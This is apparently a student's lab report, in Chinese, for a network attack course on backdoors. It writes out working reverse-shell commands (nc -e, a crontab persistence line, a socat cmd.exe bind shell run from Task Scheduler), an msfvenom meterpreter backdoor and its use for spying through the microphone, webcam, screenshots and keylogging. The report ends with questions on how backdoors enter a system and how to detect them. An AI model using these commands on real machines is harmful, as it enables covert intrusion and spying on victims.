20155218《網絡對抗》Exp2 後門原理與實踐

20155218《網絡對抗》Exp2 後門原理與實踐

經常使用後門工具實踐

1.Windows得到Linux Shell:

在Windows下，先使用ipconfig指令查看本機IP,使用ncat.exe程序監聽本機的5218端口,在Kali環境下，使用nc指令的-e選項反向鏈接Windows主機的5218端口,Windows下成功得到了一個Kali的shell，運行ls指令以下：

MAC得到linux Shell:

同Windows環境下基本類似

遇到的問題：在防火牆關閉的狀況下沒法ping通，沒法控制：

解決的方法：配置出入站規則

2.使用netcat獲取主機操做Shell，cron啓動

先在Windows系統下，監聽端口5218，用crontab -e指令編輯一條定時任務，在最後一行添加15 * * * * /bin/netcat 172.16.167.176 5218 -e /bin/sh，意思是在每一個小時的第15分鐘反向鏈接Windows主機的5218端口：

3.使用socat獲取主機操做Shell, 任務計劃啓動：

socat是ncat的加強版，它使用的格式是socat [options]

，其中兩個address是必選項，而options 是可選項。socat的基本功能就是創建兩個雙向的字節流，數據就在其間傳輸，參數address就是表明了其中的一個方向。所謂流，表明了數據的流向，而數據則能夠有許多不一樣的類型，命令中也就相應須要許多選項對各類不一樣的類型數據流進行限定與說明。

過程：

1. 在Windows系統下，打開控制面板->管理工具->任務計劃程序，建立任務，填寫任務名稱後，新建一個觸發器：
2. 在操做->程序或腳本中選擇你的socat.exe文件的路徑，在添加參數一欄填寫tcp-listen:5218 exec:cmd.exe,pty,stderr，這個命令的做用是把cmd.exe綁定到端口5218，同時把cmd.exe的stderr重定向到stdout上：

3. 建立完成以後，按Windows+L快捷鍵鎖定計算機，再次打開時，能夠發現以前建立的任務已經開始運行：
   

4. 此時，在Kali環境下輸入指令socat - tcp:172.16.167.177:5218，這裏的第一個參數-表明標準的輸入輸出，第二個流鏈接到Windows主機的5218端口，此時能夠發現已經成功得到了一個cmd shell：
   

4.使用MSF meterpreter生成可執行文件，利用ncat或socat傳送到主機並運行獲取主機Shell

實驗步驟：

1. 輸入指令

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.86.129 LPORT=1888 -f exe > 1888_backdoor.exe

1. 經過nc指令將生成的後門程序傳送到Windows主機上：
   

2. 在Kali上使用msfconsole指令進入msf控制檯，使用監聽模塊，設置payload，設置反彈回連的IP和端口：
   

3. 設置完成後，執行監聽，打開Windows上的後門程序：此時Kali上已經得到了Windows主機的鏈接，而且獲得了遠程控制的shell：

   5.使用MSF meterpreter生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容，並嘗試提權

   使用record_mic指令能夠截獲一段音頻：使用webcam_snap指令可使用攝像頭進行拍照；使用webcam stream指令可使用攝像頭進行錄像；使用screenshot指令能夠進行截屏；使用keyscan_start指令開始記錄下擊鍵的過程，使用keyscan_dump指令讀取擊鍵的記錄；
   
   

   5 基礎問題

   1. 例舉你能想到的一個後門進入到你係統中的可能方式？

• 一個比較常見的方法就是下載一些破解軟件，非正版軟件，其中很容易隱藏後門程序；

  2. 例舉你知道的後門如何啓動起來(win及linux)的方式？

• 經過遠程控制啓動
• 經過定時啓動

• 經過與應用程序綁定進行啓動

  3. Meterpreter有哪些給你映像深入的功能？

  能夠錄像和記錄鍵盤

  4. 如何發現本身有系統有沒有被安裝後門？

• 安裝殺毒軟件進行檢查

• 手動查看任務計劃程序、開機自啓動項中查找有關可疑程序。